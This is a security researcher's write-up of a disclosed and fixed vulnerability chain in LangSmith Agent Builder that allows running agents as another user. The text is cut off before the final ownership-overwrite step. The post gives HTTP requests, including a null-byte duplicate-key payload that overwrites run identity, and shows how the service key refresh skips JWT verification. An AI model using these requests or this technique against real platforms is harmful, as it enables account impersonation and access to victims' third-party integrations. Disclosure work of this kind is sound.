# Executing an AI agent on behalf of another user in LangSmith Agent Builder (Resolved)

## Introduction

This post is the third part of my research series on LangSmith — see the [first](https://0xn3va.gitbook.io/blog/2026/langsmith-unsafe-formatting-to-rce) and [second](https://0xn3va.gitbook.io/blog/2026/langsmith-chaining-service-key-leakage-and-path-confusion) posts for prior context. In this part, I turn my attention to the recently launched LangSmith Agent Builder, a no-code platform for creating AI agents. This research examines the agent's underlying architecture and the chain of vulnerabilities that led to user impersonation during agent execution.

Note: Agent Builder has since been rebranded as LangSmith Fleet. The functionality has changed slightly since then, but all the key details remain relevant. This post uses the Agent Builder name, as the vulnerability was discovered prior to the rebranding.

## TL;DR

This post describes a vulnerability in LangSmith Agent Builder that could allow an attacker to execute an AI agent on behalf of another user. The attack chain combined four weaknesses: (1) Agent Server did not validate the run configuration against a strict schema, allowing redundant fields to be stored alongside the actual execution data; (2) null bytes in JSON keys were silently stripped during serialisation, enabling a duplicate key to be smuggled into the configuration and overwrite the user identity set by Agent Server; (3) the agent did not verify the `X-Service-Key` JWT signature during token refresh, allowing an attacker to generate a valid service key scoped for a victim; (4) access control on assistants did not prevent ownership metadata from being overwritten, allowing an attacker to transfer an assistant to a victim's account. Chaining these issues granted full access to any third-party integrations — such as Slack, Gmail, or Google Calendar — that the victim had previously configured.

Note: This research details a vulnerability that was responsibly disclosed to the LangChain team and fully remediated within hours of the initial report. LangChain has confirmed there is no evidence of this issue being exploited in the wild. This write-up is being shared strictly for educational purposes to highlight the technical nuances of securing AI agents in a multi-tenant cloud environment.

## Agent Builder Overview

LangSmith Agent Builder is an agent designed to create helpful AI agents directly from LangSmith without any code. Users can fully customise their agents by providing instructions and skills, creating sub-agents, adding MCP servers and tools, and integrating with third-party services, e.g. Gmail, GitHub, Slack, etc. For example, creating an agent to summarise a user's schedule for a day would include the following steps:

1. Add an instruction (prompt) to define the agent's role and what is expected from it; e.g. "You are a personal assistant who reads all events scheduled for today, prepares a plan for the day and sends it to Slack. You should focus on ..."
2. Add necessary tools to list events in Google Calendar and send messages to Slack.
3. Set up integration with Google Calendar and Slack.
4. Add a trigger to schedule runs every day at 8 AM.

![Schedule Planner Agent](https://32049783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo2KSUh1xGnBK1FA4q0CR%2Fuploads%2Fgit-blob-8a5eeeba888fdf6efb49cf4003333c48b1df3f01%2Fschedule_planner_agent.png?alt=media)

Once created, this agent will be triggered every morning at 8 AM to read the day's events from Google Calendar, prepare a schedule and send it to Slack.

## LangSmith Deployment Overview

Before diving into the Agent Builder's architecture, it is worth explaining a few key concepts of the LangSmith ecosystem. One of the features LangSmith provides is an infrastructure layer for agents called [LangSmith Deployment](https://docs.langchain.com/langsmith/deployment). It can be thought of as a standardised interface for building and deploying agents, where a user is only required to implement agent logic while the infrastructure and management layers are automatically provisioned. This is achieved by deploying an agent as an Agent Server, which serves as the underlying framework and provides [an API for creating and managing agents](https://docs.langchain.com/langsmith/server-api-ref). A user builds an application on top of Agent Server and manages it through this API, the same as for any other agent.

Agent Server is built on the concept of [graphs](https://docs.langchain.com/langsmith/agent-server#graphs), [assistants](https://docs.langchain.com/langsmith/assistants), [threads](https://docs.langchain.com/oss/python/langgraph/persistence#threads) and [runs](https://docs.langchain.com/langsmith/assistants#execution).

* **Graph** is a LangGraph graph that contains the agent logic.
* **Assistant** is a graph paired with specific configuration settings. It can be considered an instance of a graph. Assistants allow managing graph configuration (prompts, LLM configurations, tools, etc.) separately from its logic, e.g. a user can create multiple assistants of the same graph with different behaviour at runtime.
* **Thread** is a collection of [checkpoints](https://docs.langchain.com/oss/python/langgraph/persistence#checkpoints) with the graph's state at every [super-step](https://docs.langchain.com/oss/python/langgraph/graph-api). This implements the [persistence layer](https://docs.langchain.com/oss/python/langgraph/persistence) that allows access to the graph's state after execution.
* **Run** is an invocation of an assistant.

The relationship between these concepts is reflected in the diagram below, taken from the [documentation](https://docs.langchain.com/langsmith/assistants#execution).

![Agent Execution Diagram](https://32049783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo2KSUh1xGnBK1FA4q0CR%2Fuploads%2Fgit-blob-8cafc77c38f4eb141d02faebc4f368ff07f01a6b%2Fagent_execution.png?alt=media)

This diagram shows how a run combines an assistant with a thread to execute the graph:

* **Graph (blue)**: The deployed code containing the agent's logic.
* **Assistants (light blue)**: Configuration options (model, prompts, tools).
* **Threads (orange)**: State containers for conversation history.
* **Runs (green)**: Executions that pair an assistant + thread.

Example combinations:

* **Run: A1 + T1**: Assistant 1 configuration applied to User A's conversation.
* **Run: A1 + T2**: Same assistant serving User B (different conversation).
* **Run: A2 + T1**: Different assistant applied to User A's conversation (configuration switch).
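The combinations above can be sketched with a toy model (the class names and fields here are illustrative, not the actual Agent Server implementation):

```python
from dataclasses import dataclass, field

@dataclass
class Assistant:
    assistant_id: str
    graph: str    # the deployed code containing the agent's logic
    config: dict  # model, prompts, tools

@dataclass
class Thread:
    thread_id: str
    state: list = field(default_factory=list)  # conversation history

@dataclass
class Run:
    assistant: Assistant
    thread: Thread

    def execute(self, message: str) -> str:
        # A run applies the assistant's configuration to the thread's state.
        self.thread.state.append(message)
        return f"{self.assistant.graph} with config {self.assistant.config}"

a1 = Assistant("A1", "deep_agent", {"model": "model-x"})
a2 = Assistant("A2", "deep_agent", {"model": "model-y"})
t1, t2 = Thread("T1"), Thread("T2")

Run(a1, t1).execute("hi")    # A1 + T1: Assistant 1 on User A's conversation
Run(a1, t2).execute("hi")    # A1 + T2: same assistant, User B's conversation
Run(a2, t1).execute("more")  # A2 + T1: configuration switch on the same thread
```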

When a user deploys an Agent Server application, they are deploying one or more [graphs](https://docs.langchain.com/langsmith/application-structure#graphs), a database for [persistence](https://docs.langchain.com/langsmith/agent-server#persistence-and-task-queue) and a [task queue](https://docs.langchain.com/langsmith/agent-server#persistence-and-task-queue). The Agent Server API provides endpoints for creating and managing assistants, threads, runs, and more. Using these endpoints a user can interact with the deployed agent.

## Agent Server Authentication and Access Control

Agent Server is built on LangGraph, where authentication and authorisation are handled by [@auth.authenticate](https://reference.langchain.com/python/langsmith/deployment/sdk/#langgraph_sdk.auth.Auth.authenticate) and [@auth.on](https://reference.langchain.com/python/langsmith/deployment/sdk/#langgraph_sdk.auth.Auth.on) handlers. LangGraph calls the user's `@auth.authenticate` handler on every request to validate credentials and return user information, e.g.:

```python
from langgraph_sdk import Auth

auth = Auth()

@auth.authenticate
async def authenticate(headers: dict) -> Auth.types.MinimalUserDict:
    if not is_authenticated(headers):
        raise Auth.exceptions.HTTPException(
            status_code=401,
            detail="Auth failed"
        )
    return {
        "identity": "user_id",
        # ...
    }
```

After authentication, the user's `@auth.on` handlers are called to control access to specific resources, e.g. assistants, threads, etc. The access control logic is based on metadata contained in the payload sent to the handler. For example, the code snippet below contains two handlers for the `create` and `read` actions on assistants. The `@auth.on.assistants.create` handler stores the owner identity in metadata during creation, while the `@auth.on.assistants.read` handler uses a [filter dictionary](https://docs.langchain.com/langsmith/auth#filter-operations) to check whether the current user matches the stored identity. This ensures that read access to the assistant is granted only to the user who created it.

```python
@auth.on.assistants.create
async def on_assistants_create(
    ctx: Auth.types.AuthContext,
    value: Auth.types.on.assistants.create.value,
):
    metadata = value.setdefault("metadata", {})
    metadata["identity"] = ctx.user.identity

@auth.on.assistants.read
async def on_assistants_read(
    ctx: Auth.types.AuthContext,
    value: Auth.types.on.assistants.read.value,
):
    return {
        "identity": ctx.user.identity,
    }
```
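The filter dictionary returned by `on_assistants_read` is matched against the resource's metadata. A simplified sketch of how such a filter could be evaluated (an illustration of the concept, not LangGraph's actual matching code):

```python
def matches_filter(metadata: dict, filter_dict: dict) -> bool:
    """True when every filter key equals the corresponding metadata value."""
    return all(metadata.get(key) == value for key, value in filter_dict.items())

# Metadata stored by the create handler for Alice's assistant.
assistant_metadata = {"identity": "alice"}

# Alice's read filter matches her own assistant...
assert matches_filter(assistant_metadata, {"identity": "alice"})
# ...while Bob's filter does not, so the read is denied.
assert not matches_filter(assistant_metadata, {"identity": "bob"})
```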

See the [documentation](https://docs.langchain.com/langsmith/auth) for more details and examples.

## Agent Builder Architecture

After getting familiar with LangSmith Deployment and Agent Server, we can take a closer look at Agent Builder. Agent Builder is an Agent Server application for creating and running user agents. It is deployed with two graphs: `deep_agent_generator` and `deep_agent`. `deep_agent_generator` implements the agent builder logic for creating new agents from the UI based on user requests. `deep_agent` implements the core logic for users' agents created manually or using `deep_agent_generator`. Creating a new agent means creating a new assistant with the `deep_agent` graph and custom configuration settings. As a result, Agent Builder hosts agents for all users and is responsible for controlling access to resources.

`deep_agent` is built on [Deep Agents](https://docs.langchain.com/oss/python/deepagents/overview), which provides an agent harness with built-in capabilities for task planning, file systems for context management, subagent spawning, and long-term memory. Essentially, `deep_agent` is a general-purpose agent that can be configured to handle any task by providing instructions, skills, and tools. This makes no-code agent creation possible because a user does not need to implement the tool calling loop alongside the rest of the agent's internal logic.

While there are many technical details that could be explored thoroughly, it is worth focusing on three main aspects necessary to understand the vulnerability:

* Long-term memory.
* Tools and integrations.
* Authentication.

**Long-term memory**

`deep_agent` has access to a store backend which serves as persistent storage. This enables [long-term memory](https://docs.langchain.com/oss/python/deepagents/long-term-memory), where files can persist across threads.

```mermaid
flowchart LR
    deep_agent[Deep Agent]
    path_router{Path Router}
    store_backend[Store Backend]
    state_backend[State Backend]
    persistent_storage[(Persistent<br>across threads)]
    ephemeral_storage[(Ephemeral<br>single thread)]

    deep_agent --> path_router
    path_router --> |/memories/*| store_backend
    path_router --> |other| state_backend
    store_backend --> persistent_storage
    state_backend --> ephemeral_storage
```

For example, the long-term memory stores user's instructions (`/memories/AGENTS.md`), available tools (`/memories/tools.json`) and subagents (`/memories/subagents/*`).
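The routing shown in the diagram reduces to a simple prefix check (a sketch of the behaviour, not the actual Deep Agents implementation):

```python
def route_backend(path: str) -> str:
    # Paths under /memories/ persist across threads via the store backend;
    # everything else lives in the ephemeral state of a single thread.
    return "store" if path.startswith("/memories/") else "state"

assert route_backend("/memories/AGENTS.md") == "store"
assert route_backend("/memories/subagents/researcher.md") == "store"
assert route_backend("/scratch/notes.txt") == "state"
```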

Agent Builder uses a PostgreSQL database as the store backend, and files are addressed there by a `(namespace, key)` pair, where `namespace` consists of an assistant ID and the `filesystem` literal, e.g. `3ddf47dc-dfc8-4329-a92b-07e5535fcc35.filesystem`, while `key` contains a path to a file, e.g. `/AGENTS.md`. This can be seen by retrieving a single item using the [Agent Server API](https://docs.langchain.com/langsmith/agent-server-api/store).

```http
GET /store/items?key=/AGENTS.md&namespace=3ddf47dc-dfc8-4329-a92b-07e5535fcc35.filesystem HTTP/1.1
Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
x-auth-scheme: langsmith-api-key
X-API-Key: <api_key>
X-Tenant-Id: <tenant_id>
```

```http
HTTP/1.1 200 OK
Content-Type: application/json

{
    "namespace": ["3ddf47dc-dfc8-4329-a92b-07e5535fcc35", "filesystem"],
    "key": "/AGENTS.md",
    "value": {
        "content": ["You are a helpful agent"],
        "created_at": "2026-01-30T09:42:48.316Z",
        "modified_at": "2026-01-30T09:42:48.316Z"
    },
    "created_at": "2026-01-30T09:42:48.362763+00:00",
    "updated_at": "2026-01-30T09:42:48.362763+00:00"
}
```
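The `(namespace, key)` addressing can be modelled as a dictionary keyed by both parts; the assistant ID inside the namespace is what keeps one agent's memories separate from another's (an illustrative sketch, not the actual storage schema):

```python
store: dict = {}

def put_item(namespace: tuple, key: str, value: dict) -> None:
    # Items are addressed by the (namespace, key) pair.
    store[(namespace, key)] = value

def get_item(namespace: tuple, key: str):
    return store.get((namespace, key))

ns = ("3ddf47dc-dfc8-4329-a92b-07e5535fcc35", "filesystem")
put_item(ns, "/AGENTS.md", {"content": ["You are a helpful agent"]})

assert get_item(ns, "/AGENTS.md") is not None
# A different assistant ID produces a different namespace and sees nothing.
assert get_item(("another-assistant-id", "filesystem"), "/AGENTS.md") is None
```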

**Tools and integrations**

By default, `deep_agent` comes with [built-in tools](https://docs.langchain.com/oss/python/deepagents/harness#file-system-access) inherited from `Deep Agents` for accessing the file system, such as `ls`, `read_file`, and `write_file`. Additionally, LangSmith provides a default MCP server `[eu.]tools.langchain.com` with [a variety of tools](https://docs.langchain.com/langsmith/agent-builder-tools) that give agents access to emails, calendars, chats, code, web utilities, and more.

```mermaid
flowchart LR
    agent_builder[Agent Builder]
    third_party[Google, GitHub,<br/>Slack, etc]

    agent_builder --> |call tools| mcp
    mcp --> |access resources| third_party

    subgraph LangSmith[LangSmith]
        mcp[MCP]
        backend[Backend]

        mcp --> |get creds| backend
    end
```

Obviously, the default tools require access to third-party services like Google, GitHub, or Slack to work. Two types of integrations are supported. The first type uses credentials to authenticate with a third-party service: a user adds the required credentials (e.g. an API token) to workspace secrets, and the MCP server retrieves them from [LangSmith Backend](https://api.smith.langchain.com/docs) every time an agent calls a tool.

The second type uses OAuth to obtain an access token for a third-party service: a user sets up a connection with an OAuth provider and grants access to resources with the required permissions. The MCP server then uses the established connection to generate an active access token for tool execution. It is worth noting that once a connection is established, the MCP server can keep generating active tokens with the same scope until the integration is removed. OAuth integrations are managed by [LangSmith Host Backend](https://api.host.langchain.com/docs), and the described behaviour can be observed via the `POST /v2/auth/authenticate` endpoint. The request below initiates authentication in Slack for a user with the provided `user_id` and `scopes`.

```http
POST /v2/auth/authenticate HTTP/1.1
Host: api.host.langchain.com
X-API-Key: <api_key>
Content-Type: application/json

{
    "user_id":"6a6e9e8f-b881-4f4d-990e-77c3a538a588",
    "provider":"slack-agent-builder",
    "scopes":["users:read"],
    "use_agent_builder_public_oauth": true
}
```

Since this is the first time a user is setting up the integration, the server returns a URL to authorise the requested access to Slack.

```http
HTTP/1.1 200 OK
Content-Type: application/json

{
    "status": "pending",
    "url": "https://slack.com/oauth/v2/authorize?client_id=4518649543379.9651146644741&redirect_uri=https%3A%2F%2Fsmith.langchain.com%2Fhost-oauth-callback%2Fslack-agent-builder&scope=users%3Aread&response_type=code&state=BJUJ0z_xZDdoqVQ7BP3KSO2Gc5nbFIgrL2PXcL6-6LQ&access_type=offline&prompt=consent",
    "auth_id": "BJUJ0z_xZDdoqVQ7BP3KSO2Gc5nbFIgrL2PXcL6-6LQ",
    "token": null
}
```

Once the access is granted, access tokens can be generated by sending the same request again.

```http
POST /v2/auth/authenticate HTTP/1.1
Host: api.host.langchain.com
X-API-Key: <api_key>
Content-Type: application/json

{
    "user_id":"6a6e9e8f-b881-4f4d-990e-77c3a538a588",
    "provider":"slack-agent-builder",
    "scopes":["users:read"],
    "use_agent_builder_public_oauth": true
}
```

```http
HTTP/1.1 200 OK
Content-Type: application/json

{
    "status": "completed",
    "url": null,
    "auth_id": null,
    "token": "xoxb-81120257253410-9202564180440-eH3AoACl7LXMojRZ11TlciD"
}
```
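The two-phase behaviour of `POST /v2/auth/authenticate` can be modelled as a tiny state machine: the first call for a given `(user_id, provider)` pair returns a pending authorisation URL, and every later call mints a fresh token with the originally granted scope (a toy model for illustration, not the real Host Backend logic):

```python
class OAuthConnections:
    def __init__(self) -> None:
        self._granted: dict = {}  # (user_id, provider) -> granted scopes

    def authenticate(self, user_id: str, provider: str, scopes: list) -> dict:
        key = (user_id, provider)
        if key not in self._granted:
            # First call: the user must authorise via the returned URL.
            # (Here we pretend consent is granted immediately.)
            self._granted[key] = scopes
            return {"status": "pending",
                    "url": f"https://{provider}/oauth/authorize",
                    "token": None}
        # Any later call: mint a fresh token with the granted scope.
        return {"status": "completed", "url": None,
                "token": f"token-for-{user_id}"}

conns = OAuthConnections()
first = conns.authenticate("user-1", "slack", ["users:read"])
second = conns.authenticate("user-1", "slack", ["users:read"])
assert first["status"] == "pending" and second["status"] == "completed"
```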

**Authentication**

Agent Builder implements multiple authentication schemes, relying on the LangSmith Platform Backend for authentication. The most important are the `langsmith-agent` and `langsmith-api-key` schemes, which allow authentication using the `Authorization`, `X-API-Key`, and `X-Service-Key` headers. Both schemes return the user information from the snippet below.

```python
{
    "identity": ls_user_id,
    "organization_id": organization_id,
    "tenant_id": tenant_id,
    "ls_user_id": ls_user_id,
    "agent_builder_passthrough_headers": encrypted_passthrough_headers,
    # ...
}
```

In addition to standard fields such as `tenant_id` and `ls_user_id`, the user information contains `agent_builder_passthrough_headers` with HTTP headers encrypted with a secret key. These headers are passed to an agent at runtime, and the agent uses them to authenticate users to the default MCP server. The passthrough headers include the common set of headers used for authentication in LangSmith.

```python
{
    "X-Organization-Id": organization_id,
    "X-Tenant-Id": tenant_id,
    "X-User-Id": ls_user_id,
    "X-Service-Key": get_x_service_jwt_token(payload),
    # ...
}
```

One of the headers is `X-Service-Key`, which carries a service key scoped to the organisation, tenant, and user. Agent Builder generates this key during authentication and adds it to the passthrough headers; the agent then uses it for authentication at runtime.
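`get_x_service_jwt_token()` is internal to LangSmith, so its exact implementation is unknown; a minimal sketch of what a scoped, short-lived service key generator might look like (HS256 via the standard library, with a placeholder secret; purely illustrative):

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"service-signing-secret"  # placeholder, not a real key

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def get_x_service_jwt_token(payload: dict, ttl_seconds: int = 300) -> str:
    # Header, scoped claims with an expiry, and an HMAC-SHA256 signature.
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    claims = {**payload, "exp": int(time.time()) + ttl_seconds}
    body = b64url(json.dumps(claims).encode())
    signature = b64url(
        hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    )
    return f"{header}.{body}.{signature}"

key = get_x_service_jwt_token(
    {"tenant_id": "t-1", "user_id": "u-1", "organization_id": "o-1"}
)
assert key.count(".") == 2
```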

## Overwriting Run Configuration

The root cause of the vulnerability lay in the run creation logic on Agent Server. It was possible to overwrite the run configuration and control fields that were not intended to be controlled by a user. Let's look at how runs are created and executed to understand the issue. Agent Server provides several endpoints to create and execute a run. For example, the `POST /threads/<thread_id>/runs/wait` endpoint creates a run in an existing thread and waits for the final output. The request and response for this endpoint look like this:

```http
POST /threads/<thread_id>/runs/wait HTTP/1.1
Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
X-Auth-Scheme: langsmith-api-key
X-API-Key: <api_key>
X-Tenant-Id: <tenant_id>
Content-Type: application/json

{
    "input": {
        "messages": [
            {
                "id": "266eab49-84eb-4efa-ad14-7fe05c25e6dc",
                "type": "human",
                "content": "Hi, how are you?"
            }
        ]
    },
    "assistant_id": "<assistant_id>"
}
```

```http
HTTP/1.1 200 OK
Content-Type: application/json
Location: /threads/<thread_id>/runs/<run_id>/join
Content-Location: /threads/<thread_id>/runs/<run_id>

{
    "messages":[
        {
            "content": "Hi, how are you?",
            "type": "human",
            // ...
        },
        {
            "content": "Hello! I'm doing well, thank you for asking! ...",
            "type": "ai",
            // ...
        }
    ],
    "tools": []
}
```

The request contains a message from a user addressed to a specified assistant, and the response contains the conversation within the current thread. The created run can be seen using the `GET /threads/<thread_id>/runs/<run_id>` endpoint.

```http
GET /threads/<thread_id>/runs/<run_id> HTTP/1.1
Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
x-auth-scheme: langsmith-api-key
X-API-Key: <api_key>
X-Tenant-Id: <tenant_id>
```

```http
HTTP/1.1 200 OK
Content-Type: application/json

{
    "run_id": "<run_id>",
    "thread_id": "<thread_id>",
    "assistant_id": "<assistant_id>",
    "status": "success",
    // ...
    "kwargs": {
        "input": {
            "messages": [{
                "id": "fb2ed1bc-105f-40a7-8514-03d706d85a3a",
                "type": "human",
                "content": "Hi, how are you?"
            }]
        },
        "config": {
            "configurable": {
                // ...
                "langgraph_auth_user_id": "<user_id>",
                "langgraph_auth_user": {
                    "identity": "<user_id>",
                    "tenant_id": "<tenant_id>",
                    "ls_user_id": "<user_id>",
                    "agent_builder_passthrough_headers": "gAAAAABpkJK9vcMkhPuhNlpLbiBL5WVvA77igqmdJcxsQ...",
                    // ...
                }
            },
            // ...
        },
        // ...
    }
}
```

The response contains the run details including all arguments passed to the agent. The most interesting field in the run details is `kwargs.config.configurable.langgraph_auth_user`, which contains information about the current user set during authentication. This field is used to initialise the context and define the current user at runtime. In other words, `langgraph_auth_user` defines the user on whose behalf the run will be executed.

At a high level, run execution consists of the following steps:

1. A user sends a request to `POST /threads/<thread_id>/runs/wait`.
2. Agent Server authenticates the user and adds user information to the global context.
3. Agent Server parses the payload from the request, writes several fields to the configuration, including `langgraph_auth_user`, and creates a new run in the PostgreSQL database.
4. The worker on Agent Server picks up the run, initialises the global context using the user information from `langgraph_auth_user`, and executes the graph.
5. Agent Server waits for the run to complete and returns the output in the response.
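A toy model of steps 2–4 (for illustration only): the server writes the authenticated identity into the stored configuration, and the worker later trusts whatever identity it reads back from the database, not the live request.

```python
database: dict = {}  # stand-in for the runs table

def create_run(run_id: str, payload: dict, authenticated_user: str) -> None:
    # The server sets langgraph_auth_user from the authenticated identity.
    config = payload.get("config", {})
    config.setdefault("configurable", {})["langgraph_auth_user"] = {
        "identity": authenticated_user
    }
    database[run_id] = {"input": payload.get("input"), "config": config}

def worker_execute(run_id: str) -> str:
    # The worker initialises the run context from stored data only.
    config = database[run_id]["config"]
    return config["configurable"]["langgraph_auth_user"]["identity"]

create_run("run-1", {"input": {"messages": []}, "config": {}},
           authenticated_user="alice")
assert worker_execute("run-1") == "alice"
```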

The most interesting aspect of this flow is storing run data in the database. The `config` from `kwargs` is stored as JSON data using the [JSONB](https://www.postgresql.org/docs/current/datatype-json.html) PostgreSQL type. Using this type requires an adapter to convert a Python object to a JSONB PostgreSQL value. Agent Server uses [psycopg.types.json.Jsonb](https://www.psycopg.org/psycopg3/docs/api/types.html#psycopg.types.json.Jsonb) as such an adapter. In the code it looks like this:

```python
from psycopg.types.json import Jsonb

class Runs(Authenticated):
    # ...
    @staticmethod
    async def put(
        conn: AsyncConnection[DictRow],
        assistant_id: UUID,
        kwargs: dict,
        # ...
    ) -> AsyncIterator[Run]:
        # ...
        params = {
            "kwargs": Jsonb(kwargs),
            "config": Jsonb(kwargs.get("config")),
            # ...
        }
        # ...
        cur = await conn.execute(query, params, binary=True)
        # ...
```

In the code snippet, `Jsonb` receives only the object to wrap, but it also has an optional second argument, `dumps`, which accepts a function used to serialise the wrapped object. These lines in [the documentation for psycopg.types.json.Jsonb](https://www.psycopg.org/psycopg3/docs/api/types.html#psycopg.types.json.Jsonb) caught my attention:

> If a dumps function is passed to the wrapper, use it to dump the wrapped object. Otherwise use the function specified by set\_json\_dumps().

Searching for `set_json_dumps()` revealed that the default dump function is set to `json_dumpb()`, which serialises objects using the `orjson` library.

```python
async def _configure_connection(conn: AsyncConnection[DictRow]):
    set_json_dumps(json_dumpb, conn)
    # ...
```

```python
def json_dumpb(obj) -> bytes:
    try:
        dumped = orjson.dumps(obj, default=default, option=_option)
    except TypeError as e:
        # ...
    return dumped.replace(b"\\\\u0000", b"").replace(b"\\u0000", b"")
```

In addition to dumping the object, `json_dumpb()` performs an extra step to remove null bytes from the dumped data. This step was most likely added to prevent errors in PostgreSQL, as JSONB can't contain null bytes.

By the time I discovered this, I was looking for possible ways to execute a run on behalf of another user. Since everything was tied to the data in `langgraph_auth_user`, I tried to find a way to control this field. Doing so directly was impossible, because Agent Server overwrote `langgraph_auth_user` with the current user's data. On the other hand, Agent Server did not validate the input against a strict schema during run creation and stored redundant, unused data in the database alongside the data actually used for execution. The removal of null bytes during the conversion of Python objects to PostgreSQL JSONB suggested that I could add a null byte to a key inside the configuration, which would be passed unchanged to `json_dumpb()`. After dumping and null-byte removal, this smuggled key would become a duplicate of the key I could not control directly. As a result, PostgreSQL would receive JSONB with duplicate keys and simply keep the last one, following its "last wins" resolution strategy.
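The duplicate-key mechanics can be reproduced locally with the standard `json` module as a stand-in for `orjson` (the real `json_dumpb()` uses `orjson`, but the escaping of null bytes works the same way):

```python
import json

config = {
    # Set by the server; cannot be controlled directly.
    "configurable": {"langgraph_auth_user": {"identity": "attacker"}},
    # Smuggled key containing a null byte.
    "configurable\u0000": {"langgraph_auth_user": {"identity": "victim"}},
}

# json.dumps escapes the null byte, so the keys are still distinct here.
dumped = json.dumps(config)
assert '"configurable\\u0000"' in dumped

# Stripping the escape sequence, as json_dumpb() does, creates a duplicate key.
stripped = dumped.replace("\\u0000", "")

# PostgreSQL JSONB (like Python's json module) resolves duplicates as "last wins".
assert json.loads(stripped)["configurable"]["langgraph_auth_user"]["identity"] == "victim"
```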

I sent the request below to test the possibility of smuggling a key in JSON data and received a quite promising response.

```http
POST /threads/<thread_id>/runs/wait HTTP/1.1
Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
X-Auth-Scheme: langsmith-api-key
X-API-Key: <api_key>
X-Tenant-Id: <tenant_id>
Content-Type: application/json

{
    "input": {
        "messages": [
            {
                "id": "266eab49-84eb-4efa-ad14-7fe05c25e6dc",
                "type": "human",
                "content": "Hi, how are you?"
            }
        ]
    },
    "config": {
        "configurable": {},
        "configurable\u0000": {}
    },
    "assistant_id": "<assistant_id>"
}
```

```http
HTTP/1.1 200 OK
Content-Type: application/json
location: /threads/<thread_id>/runs/<run_id>/join
content-location: /threads/<thread_id>/runs/<run_id>

{
    "__error__": {
        "error": "ValueError",
        "message": "Missing Agent Builder passthrough headers"
    }
}
```

This was a good sign because Agent Server could not find the `agent_builder_passthrough_headers` field, which meant the smuggled `configurable\u0000` key overwrote `configurable` prepared by Agent Server before saving data to the database.

## Generating Service Key for Another User

Unfortunately, overwriting the configuration data was not sufficient to execute runs in the context of a different user, since tool execution and access to integrations depended on credentials passed in the `agent_builder_passthrough_headers` field. While reviewing how Agent Builder calls tools, I came across the `ServiceKeyAuth` class, which is used to add headers to MCP requests. This class inherits from `httpx.Auth` and is passed to the HTTP client created for each MCP server. In other words, Agent Builder creates a separate HTTP client per MCP, which an agent invokes at runtime to call the tools loaded from that MCP. The most interesting feature of `ServiceKeyAuth` is that it can refresh a service key if one is present in the headers. The refresh is optional: it is enabled only for the default MCP and disabled for user MCPs.

```python
class ServiceKeyAuth(httpx.Auth):
    def __init__(self,
        initial_headers: dict[str, str],
        *,
        enable_service_key_refresh: bool,
    ) -> None:
        self.headers = initial_headers.copy()
        self.enable_service_key_refresh = enable_service_key_refresh
        if self.enable_service_key_refresh:
            self._ensure_service_key_is_fresh()

    # ...

    def _ensure_service_key_is_fresh(self) -> None:
        # ...
        if _is_service_key_expiring_soon(service_key):
            self.headers = _regenerate_service_key(self.headers)
```

`ServiceKeyAuth` accepts `initial_headers`, which are retrieved from the `agent_builder_passthrough_headers` field. If `X-Service-Key` is present among the passed headers and has expired or is close to expiration, `ServiceKeyAuth` refreshes it during initialisation or execution. The code below contains the functions responsible for refreshing the service key.

```python
def _is_service_key_expiring_soon(
    service_key: str, threshold_seconds: int = 60
) -> bool:
    payload = _decode_jwt_payload(service_key)
    exp = payload.get("exp")
    if not exp:
        return False

    current_time = time.time()
    return (exp - current_time) <= threshold_seconds

def _regenerate_service_key(headers: dict[str, str]) -> dict[str, str]:
    from langgraph_api.utils import get_auth_ctx

    auth_ctx = get_auth_ctx()
    user = auth_ctx.user or {}
    # ...
    tenant_id = user.get("tenant_id") or passthrough_headers.get("X-Tenant-Id")
    ls_user_id = user.get("ls_user_id") or passthrough_headers.get("X-User-Id")
    organization_id = user.get("organization_id") or passthrough_headers.get(
        "organization_id"
    )

    payload: dict[str, str] = {}
    if tenant_id:
        payload["tenant_id"] = tenant_id
    if ls_user_id:
        payload["user_id"] = ls_user_id
    if organization_id:
        payload["organization_id"] = organization_id

    new_service_key = get_x_service_jwt_token(payload=payload)

    # ...
```

`_is_service_key_expiring_soon()` decodes a service key and gets the `exp` claim from the payload to validate its expiration time. `_decode_jwt_payload()` does not verify the JWT signature; it simply extracts the payload by splitting the service key at the dot `.` and base64-decoding the second part.

`_regenerate_service_key()` retrieves the user information from the global context, gets `organization_id`, `tenant_id` and `user_id` from there and creates a new service key using this data. Since this code is executed at runtime, `get_auth_ctx()` returns the global context initialised by the worker using data retrieved from the database. In other words, the user information contains data taken from the `langgraph_auth_user` field.

This meant that overwriting the run configuration and passing an expired or near-expired service key inside `agent_builder_passthrough_headers` allowed generating a service key scoped for any user, tenant, and organisation. However, Agent Builder uses `agent_builder_passthrough_headers` during agent initialisation to call various API endpoints and collect all necessary resources, such as workspace secrets or user MCP servers. Additionally, only the `Authorization` and `X-Service-Key` headers can be present in `agent_builder_passthrough_headers`, because other authentication headers are discarded during processing. Passing a valid token in `Authorization` and an expired service key (or an unsigned JWT with an `exp` claim in the payload) in `X-Service-Key` was therefore not an option, as it would result in authentication failure: `X-Service-Key` takes priority over `Authorization`.

It was potentially possible to create a run, copy the `agent_builder_passthrough_headers` with the still-active (for 5 minutes) `X-Service-Key` from that run, and create a new run at exactly the right time, when the key is still valid but will expire within a minute. However, I found a way to avoid these complications and set an arbitrary `X-Service-Key` only for `ServiceKeyAuth`.

Agent Builder supports user MCP servers in addition to the default MCP. When a user adds an MCP, they can select the `Static Headers` authentication method and specify arbitrary headers. Agent Builder obtains these headers from LangSmith Platform Backend when loading tools from the MCP with the corresponding URL. The received headers are passed to `ServiceKeyAuth` as `initial_headers`, which includes them in requests to the MCP. As a result, it was possible to add an MCP with the URL of the default MCP, `https://[eu.]tools.langchain.com/mcp`, and the required headers, which would be combined with `agent_builder_passthrough_headers` and passed to `ServiceKeyAuth` as `initial_headers`. These static headers did not affect agent initialisation in any way, as they are not used outside tool loading and calling.

